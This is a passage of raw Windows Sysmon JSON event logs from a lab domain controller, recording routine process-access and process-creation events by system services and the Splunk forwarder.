07:01:00.277","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-00101D8B0B00}","TargetProcessId":"1008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7551,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.324\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-00104C8E0B00}\r\nTargetProcessId: 5092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.324","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-00104C8E0B00}","TargetProcessId":"5092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7552,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.324\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-00104C8E0B00}\r\nTargetProcessId: 5092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.324","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-00104C8E0B00}","TargetProcessId":"5092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7553,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.340\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-00104C8E0B00}\r\nTargetProcessId: 5092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.340","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-00104C8E0B00}","TargetProcessId":"5092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7554,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.559\r\nProcessGuid: {E2A3D6B1-132C-5F25-0000-001073910B00}\r\nProcessId: 3468\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.559","ProcessGuid":"{E2A3D6B1-132C-5F25-0000-001073910B00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7555,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.559\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-00107B3A0B00}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.559","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-00107B3A0B00}","TargetProcessId":"3468","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7556,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.559\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-00107B3A0B00}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.559","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-00107B3A0B00}","TargetProcessId":"3468","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7557,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.559\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.559","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7558,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.559\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.559","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7559,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.559\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 